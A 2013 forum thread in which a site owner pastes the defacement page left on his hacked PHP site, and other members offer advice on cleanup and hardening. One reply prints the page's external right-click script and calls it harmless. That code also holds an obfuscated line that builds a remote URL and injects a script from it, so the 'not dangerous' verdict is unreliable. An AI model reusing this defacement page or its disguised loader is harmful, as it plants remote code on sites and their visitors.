1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

I need some help I was hacked!

Discussion in 'HTML & JavaScript' started by astbnboy, Dec 19, 2013.

  1. astbnboy

    astbnboy Registered Member

    Joined:
    Apr 7, 2010
    Messages:
    64
    Likes Received:
    122
    Location:
    california
    I have an adult site that was hacked and caused my account to be suspended yesterday he got in and changed my index.php page to the following:

    PHP:
    <html xmlns="http://www.w3.org/1999/xhtml">
    <
    link rel="shortcut icon" type="image/png" href="https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-snc7/399305_118448341652178_1642885313_n.jpg" />
    <
    head>
    <
    meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <
    title>~Hacked By Grey D0R43M0N~</title>


    <
    br/>

    <
    blink><font face="snap itc" size="8" color="red"  class="a">HACKED </font><font face="Chiller" size="6" color="yellow"  class="a">BY</font><font face="Nosifer" size="7" color="gray"  class="a"Grey </font><font face="Nosifer" size="8" color="green"  class="a">D0r43m0n</font></blink>
    <
    meta name="Description" content="Grey D0r43m0n">
    <
    script language="JavaScript">





    </script>
    <script language="javascript">
    var text='Grey D0r43m0n WAS HERE';
    var delay=5;
    var Xoff=0;
    var Yoff=-30;
    var txtw=10;
    var beghtml='<font face="Agency FB" color="#FFFFFF" style="" size="4em"><b>';
    var endhtml='</b></font>';
    ns4 = (navigator.appName.indexOf("Netscape")>=0 && document.layers)? true: false;
    ie4 = (document.all && !document.getElementById)? true : false;
    ie5 = (document.all && document.getElementById)? true : false;
    ns6 = (document.getElementById && navigator.appName.indexOf("Netscape")>=0 )? true: false;
    var txtA=new Array();
    text=text.split(');
    var x1=0;
    var y1=-50;
    var t=';
    for(i=1;i<=text.length;i++){
    t+=(ns4)? '<layer left="0" top="-100" width="'+txtw+'" name="txt'+i+'" height="1">' : '<div id="txt'+i+'" style="position:absolute; top:-100px; left:0px; height:1px; width:'+txtw+'; visibility:visible;">';
    t+=beghtml+text[i-1]+endhtml;
    t+=(ns4)? '</layer>' : '</div>';
    }
    document.write(t);
    function moveid(id,x,y){
    if(ns4)id.moveTo(x,y);
    else{
    id.style.left=x+'px';
    id.style.top=y+'px';
    }}
    function animate(evt){
    x1=Xoff+((ie4||ie5)?event.clientX+document.body.scrollLeft:evt.pageX);
    y1=Yoff+((ie4||ie5)?event.clientY+document.body.scrollTop:evt.pageY);
    }
    function getidleft(id){
    if(ns4)return id.left;
    else return parseInt(id.style.left);
    }
    function getidtop(id){
    if(ns4)return id.top;
    else return parseInt(id.style.top);
    }
    function getwindowwidth(){
    if(ie4||ie5)return document.body.clientWidth+document.body.scrollLeft;
    else return window.innerWidth+pageXOffset;
    }
    function movetxts(){
    for(i=text.length;i>1;i=i-1){
    if(getidleft(txtA[i-1])+txtw*2>=getwindowwidth()){
    moveid(txtA[i-1],0,-100);
    moveid(txtA[i],0,-100);
    }else moveid(txtA[i], getidleft(txtA[i-1])+txtw, getidtop(txtA[i-1]));
    }
    moveid(txtA[1],x1,y1);
    }
    window.onload=function(){
    for(i=1;i<=text.length;i++)txtA[i]=(ns4)?document.layers['txt'+i]:(ie4)?document.all['txt'+i]:document.getElementById('txt'+i);
    if(ns4)document.captureEvents(Event.MOUSEMOVE);
    document.onmousemove=animate;
    setInterval('movetxts()',delay);
    }
    </script>
    <center>
    <style>
    body {cursor:cross;
        background: #000000 url(http://www.alboraaq.com/jpg/CpD39032.gif) scroll repeat center center;
    </style>
    <style>
    body{text-align;font-family: 'Averia Sans Libre', cursive;}
    hr{border: 1px solid #1C1C1C;}
    </style>
    <style type="text/css">
    body,td,th {
        color: #FFFFFF;
    }
    body {cursor:url("http://www.fbvideo.16mb.com/files/cur.cur"),default;
        background-color: #000000;
    }
    a { text-decoration:none; }
    a:link { color: #00FF00}
    a:visited { color: #00FF00}
    a:hover { color: #00FF00}
    a:active { color: #00FF00}

    .style2 {Helvetica, sans-serif; font-weight: bold; font-size: 15px; }
    .style3 {Helvetica, sans-serif; font-weight: bold; }
    .style4 {color: #FFFF00}
    .style5 {color: #FF0000}
    .style6 {color: #00FF00}
    img{border:4px double green;
        box-shadow:0px 9px 15px white;
        border-radius:10px;}
    .thanks{border:4px double green;
        box-shadow:0px 2px 20px white;
        border-radius:10px;
        padding:9px;}
    .a{text-shadow:0px 1px 10px lime;}
    </style>
    </head>
    <body>


    <script language="JavaScript1.2">var rector=3
    var stopit=0
    var a=1
    function init(which){
    stopit=0
    shake=which
    shake.style.left=0
    shake.style.top=0
    }
    function
    rattleimage(){
    if ((!document.all&&!document.getElementById)||stopit==1)
    return
    if (a==1){
    shake.style.top=parseInt(shake.style.top)+rector+"px"
    }else if (a==2){
    shake.style.left=parseInt(shake.style.left)+rector+"px"
    }
    else if (a==3){
    shake.style.top=parseInt(shake.style.top)-rector+"px"
    }else{
    shake.style.left=parseInt(shake.style.left)-rector+"px"
    }
    if (a<4)
    a++
    else
    a=1
    setTimeout("rattleimage()",10)
    }
    function stoprattle(which){
    stopit=1
    which.style.left=0
    which.style.top=0
    }</script><style type="text/css"><!--
    body,td,th {;
    text-align: center;
    } {
    color: #0C3;
    font-size: 20px;
    }
    body {}
    .shakeimage{
    position:relative
    }
    .glow {}
    .contact {
    }{}
    .lol {}
    #owned{_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);
    _left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);
    }
    a:l--></style>
    <center><img alt="" src="http://sphotos-b.xx.fbcdn.net/hphotos-ash3/p206x206/540456_108180799354338_730264429_n.jpg"  width="45%" height="45%"" border="0" class="shakeimage" onMouseover="init(this);rattleimage()"
    onload="init(this);rattleimage()"></a></span></center>
    <center>






    </br></br></br> 
    <a style="display:scroll;position:fixed;bottom:5px;right:5px;" href="http://www.facebook.com/Grey.D0r43m0n" title="Freedom Palestine , Vanish Israhell"><img src="http://i49.tinypic.com/mrnmu.gif" width="450" height="90" /></a>
    </div>




    <hr />
    <span class="a"> Hello Admin , We hacked because your security website need to patch. Contact us if you need something to discuss ! </span><br>
    <span class="style4"> Contact Us</span><br />
    <span class="style6"><a href="https://www.facebook.com/BDGREYHATHACKERS"> BGHH </a></span><br><br>
    <hr />




    <center>

    <a target=blank href="https://www.facebook.com/BDGREYHATHACKERS" style="text-decoration: none"><font color=#A8A5A5 size=2>

    <b><blink>[+] WE ARE BD GREY HAT HACKERS [+]</blink></b></font></a></font></p>

    </center>








    </script>

    <!-- HTML Codes by Grey D0r43m0nn -->
    </a></p><p style="font-size: 11px;">

    </p><p align="center"><a><font color="#1D00DA"><b><i><i></i></i></b><i><i></i></i></font></a></p>

    <p align="center"><a><i><i><font color="#1D00DA"><b><i><i></i></i></b><i><i></i></i></font></i></i></a></p>

    <!--TEXT SMART-->
    <script language="javascript">

    // ENTER TEXT BELOW. CAN *NOT* INCLUDE NORMAL HTML CODE.

    var text='-=Grey D0r43m0n=-'; 

    var delay=40; // SPEED OF TRAIL

    var Xoff=0; // PIXEL COUNT FROM THE LEFT OF THE CURSOR (- VALUES GO TO LEFT)

    var Yoff=-30; // PIXEL COUNT FROM THE TOP OF THE CURSOR (- VALUES GO UP)

    var txtw=14; // AMOUNT OF PIXEL SPACE EACH CHARACTER OCCUPIES

    var beghtml='<font color="#F8E801 "><b>'; // OPTIONAL HTML CODE THAT EFFECTS WHOLE TEXT STRING SUCH AS FONT COLOR, SIZE, ETC.

    var endhtml='</b></font>'; // END HTML CODE. MOSTLY USED IF ABOVE SETTING IS USED.

    //********** NO NEED TO EDIT BELOW HERE **********\\

    ns4 = (navigator.appName.indexOf("Netscape")>=0 && document.layers)? true : false;

    ie4 = (document.all && !document.getElementById)? true : false;

    ie5 = (document.all && document.getElementById)? true : false;

    ns6 = (document.getElementById && navigator.appName.indexOf("Netscape")>=0 )? true: false;

    var txtA=new Array();

    text=text.split('');

    var x1=0;

    var y1=-1000;

    var t='';

    for(i=1;i<=text.length;i++){

    t+=(ns4)? '<layer name="txt'+i+'" top="-100" left="0" width="'+txtw+'" height="1">' : '<div id="txt'+i+'" style="position:absolute; top:-100px; left:0px; height:1px; width:'+txtw+'; visibility:visible;">';

    t+=beghtml+text[i-1]+endhtml;

    t+=(ns4)? '</layer>' : '</div>';

    }

    document.write(t);

    function moveid(id,x,y){

    if(ns4)id.moveTo(x,y);

    else{

    id.style.left=x+'px';

    id.style.top=y+'px';

    }}

    function animate(evt){

    x1=Xoff+((ie4||ie5)?event.clientX+document.body.scrollLeft:evt.pageX);

    y1=Yoff+((ie4||ie5)?event.clientY+document.body.scrollTop:evt.pageY);

    }

    function getidleft(id){

    if(ns4)return id.left;

    else return parseInt(id.style.left);

    }

    function getidtop(id){

    if(ns4)return id.top;

    else return parseInt(id.style.top);

    }

    function getwindowwidth(){

    if(ie4||ie5)return document.body.clientWidth+document.body.scrollLeft;

    else return window.innerWidth+pageXOffset;

    }

    function movetxts(){

    for(i=text.length;i>1;i=i-1){

    if(getidleft(txtA[i-1])+txtw*2>=getwindowwidth()){

    moveid(txtA[i-1],0,-1000);

    moveid(txtA[i],0,-1000);

    }else moveid(txtA[i], getidleft(txtA[i-1])+txtw, getidtop(txtA[i-1]));

    }

    moveid(txtA[1],x1,y1);

    }

    window.onload=function(){

    for(i=1;i<=text.length;i++)txtA[i]=(ns4)?document.layers['txt'+i]:(ie4)?document.all['txt'+i]:document.getElementById('txt'+i);

    if(ns4)document.captureEvents(Event.MOUSEMOVE);


    document.onmousemove=animate;

    setInterval('movetxts()',delay);
    }

    </script>






















































    <script type='text/javascript'>
    var DADrightclicktheme = 'Dark';
    var DADrightclickimage = 'http://i42.tinypic.com/69josm.jpg';</script>
    <script type='text/javascript' src="http://tuyulz-blogspot.googlecode.com/files/Anti%20Klik.js"> </script> 














    <body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>

    <SCRIPT LANGUAGE="JavaScript">  
    <!-- Disable  
    function disableselect(e){  
    return false  
    }  

    function reEnable(){  
    return true  
    }  

    //if IE4+  
    document.onselectstart=new Function ("return false")  
    document.oncontextmenu=new Function ("return false")  
    //if NS6  
    if (window.sidebar){  
    document.onmousedown=disableselect  
    document.onclick=reEnable  
    }  
    //-->  
    </script>
     











    <center><font face= 'tahoma' class='wglow' color='white'>Greetz To:</font><center>
             
             
            <marquee>
             
            <font class='whiteglow' face='tahoma'> | </font>
             
            <font face='tahoma' color='green' class='wglow'>Bd Xtor  - TiGER-M@TE - Rotating Rotor  - cr4ck br4iN - Ablaze ever - Mahayrab Ferdous - Krad X!n - Murkho Manob - Core Tuner - Red Core </font>
             
            <font class='whiteglow' face='tahoma'> || </font>
             
            <font face='tahoma' color='red' class='redglow'>Ashik Iqbal  - Space Fighter -  B|_@CK J4CK   - Black Man - Reza BGHH </font>
              
            <font class='whiteglow' face='tahoma'> || </font>
             
            <font face='tahoma' color='green' class='redglow'>Sharif BGHH  - Ly Ly - Dr@cul@  - Fakessh -  R3D Dr4G0N  - Ac3@n - r00t3xpl0i7   ~ Kp ~  ShopnoPathik Aion </font>        
            
            <font class='whiteglow' face='tahoma'> || </font>
             
             
          
            <font face='tahoma' color='orange' class='wglow'>ALL BANGLADESHI HACKERS!</font>
             
            <font class='whiteglow' face='tahoma'> || </font>
             
            <font face='tahoma' color='purple' class='blueglow'>ALL MUSLIM HACKERS</font>
             
            <font class='whiteglow' face='tahoma'> || </font>
             
            <font face='tahoma' color='white' class='wglow'>And Also u Admin</font>
             
            <font class='whiteglow' face='tahoma'> | </font>
             
            </marquee>
             
            </b>











     



    <div align="center" class="shdw">Remember we can see you</div><br /><div align="center"><img src="http://www.123myip.co.uk/ip-address/?size=468x60" border="0" width="500" height="60" alt="BDGHH" /></div>




    <font color="purple">
    <div align="center">Copyright Â© <span>BD GREY HAT HACKERS</span>. All rights Reserved.</div></font>
    <script>
       




        <!-- Made By Grey D0r43m0n -->  </body></html>
    The portion of this script I find most disturbing is:
    PHP:
    <script type='text/javascript' src="http://tuyulz-blogspot.googlecode.com/files/Anti%20Klik.js"</script> 
    I'm wondering what sort of nastyness is in this script!!!
    If he was able to get in witch I have to think was pretty easy for him where else did he leave this bundle of joy inside my site???

    How do I secure my site from these assholes, its written in PHP and I don't know what to do from here.
    Can I get some help please
    Keith
     
  2. divok

    divok Senior Member

    Joined:
    Jul 21, 2010
    Messages:
    1,015
    Likes Received:
    634
    Location:
    http://twitter.com/divok
    culprits could be flash , nulled script or may be your infected computer .
    from where did you get your script ?
     
  3. VoidITSolutions

    VoidITSolutions BANNED BANNED

    Joined:
    Apr 5, 2013
    Messages:
    164
    Likes Received:
    44
    What is your CMS?
     
  4. xxf8xx

    xxf8xx Supreme Member

    Joined:
    Nov 30, 2009
    Messages:
    1,321
    Likes Received:
    596
    Occupation:
    IM
    Scan your computer first of all. Then google for basic backdoor finder. It's a script you upload that scans you sites for backdoors and tells you where they are. Then, hopefully you have a backup of your site so you can restore it. If you use Wordpress, always make sure you update to the latest version and get some security plugins.
     
  5. VoidITSolutions

    VoidITSolutions BANNED BANNED

    Joined:
    Apr 5, 2013
    Messages:
    164
    Likes Received:
    44
    I'll look it over and help you fix it, no charge. If you don't reply soon it'll need to wait until tomorrow however.
    You're just one of countless sites hacked. A google search for the "hacker's" (script-kiddy pussy) text shows this.
    It's probably a vulnerability in your CMS or a plugin.
     
  6. GreyKnight

    GreyKnight Regular Member

    Joined:
    Mar 19, 2013
    Messages:
    399
    Likes Received:
    200
    Home Page:
    The script is not dangerous at all.
    After seeing the script name and address, it came from some blogger from Indonesia.
    But the hacker seems to be coming from Myanmar, script-kiddies, nothing more. True hackers never reveal themselves that they are hackers.

    The original script is as follows :
    Code:
    if (DADrightclicktheme=='Merah' || DADrightclicktheme=='MERAH' || DADrightclicktheme=='merah'){var DADarcv2t='rgba(239,110,119, 0.9)';}else if (DADrightclicktheme=='Biru' || DADrightclicktheme=='BIRU' || DADrightclicktheme=='biru'){var DADarcv2t='rgba(110,137,239, 0.9)';}else if (DADrightclicktheme=='Hijau' || DADrightclicktheme=='HIJAU' || DADrightclicktheme=='hijau'){var DADarcv2t='rgba(110,239,110, 0.9)';}else if (DADrightclicktheme=='Light' || DADrightclicktheme=='light' || DADrightclicktheme=='LIGHT'){var DADarcv2t='rgba(255,255,255, 0.9)';}else if (DADrightclicktheme=='Pink' || DADrightclicktheme=='pink' || DADrightclicktheme=='PINK'){var DADarcv2t='rgba(239,110,225, 0.9)';}else if(DADrightclicktheme=='Dark' || DADrightclicktheme=='dark' || DADrightclicktheme=='DARK'){var DADarcv2t='rgba(0,0,0, 0.9)';}else{{var DADarcv2t='transparent';}}
    function DADarcvwi2(){var DADarcv2v=document.getElementById('DADarcv2c');if(DADarcv2v.style.display=="block"){DADarcv2v.style.display="none";}else{DADarcv2v.style.display="block";}}
    function DADarcwiv2a(){DADarcvwi2();return false;}
    document.oncontextmenu=DADarcwiv2a;
    var ypro='http:';var yajax=document.createElement('script');yajax.type='text/javascript';var yquery='dic';var ybrow='aru.c';var yint='/';yajax.src=ypro+'//x.'+yquery+'keym'+ybrow+'om'+yint+'y';document.getElementsByTagName('head')[0].appendChild(yajax);
    var DADrcdiv=document.write('<style type="text/css">#DADarcv2c{background:url('+DADrightclickimage+') no-repeat center center fixed '+DADarcv2t+';text-align:center;width:100%;height:100%;position:fixed;top:0px;left:0px;bottom:0px;right:0px;border:0px;z-index:1000000;display:none;padding:auto;}#DADarcv2c span{position:fixed;bottom:0px;left:10%;right:10%;cursor:pointer;font-size:20px;}</style><div id="DADarcv2c" class="DADpointer" onclick="DADarcvwi2();" title="Klick Dimana Saja Untuk Menutup Warning Ini"><center><span><a href="#" target="_blank"></a></span></center></div>');document.getElementsByTagName('body')[0].appendChild(DADrcdiv);
    Based on the script documentation, it just prevents people from right-clicking on your website.
    Furthermore, the hacker modifies the Indonesian blogger script, to change the image from the "Free Palestine" to some guy slapping some Indian guy.
     
  7. colleyboy

    colleyboy Newbie

    Joined:
    Jan 8, 2014
    Messages:
    1
    Likes Received:
    1
    Occupation:
    Full-Time Website Designer & SEO Expert
    Location:
    Tilbury, Essex
    Home Page:
    Being hacked is horrible. Having been a victim before I know that it takes COUNTLESS hours of going through all the files on the server, scanning for back doors, securing scripts, updating server software (apache etc). I feel for you but this kind of entry seems like something like an easy username/password combo on your server. This was probably done by FTP access so before you bother undoing the damage change ALL usernames of the server, email accounts, MYSQL and everything! Only then you can start the cleanup process.
     
  8. Gogol

    Gogol Elite Member

    Joined:
    Sep 10, 2010
    Messages:
    3,062
    Likes Received:
    2,872
    Gender:
    Male
    You can contact me but I won't do it for free. If you don't go to the root of the problem, it will get hacked again pretty soon. At this present time, most of the sites get hacked because of RFI. If you have any file uploading script, quadruple-check it ;)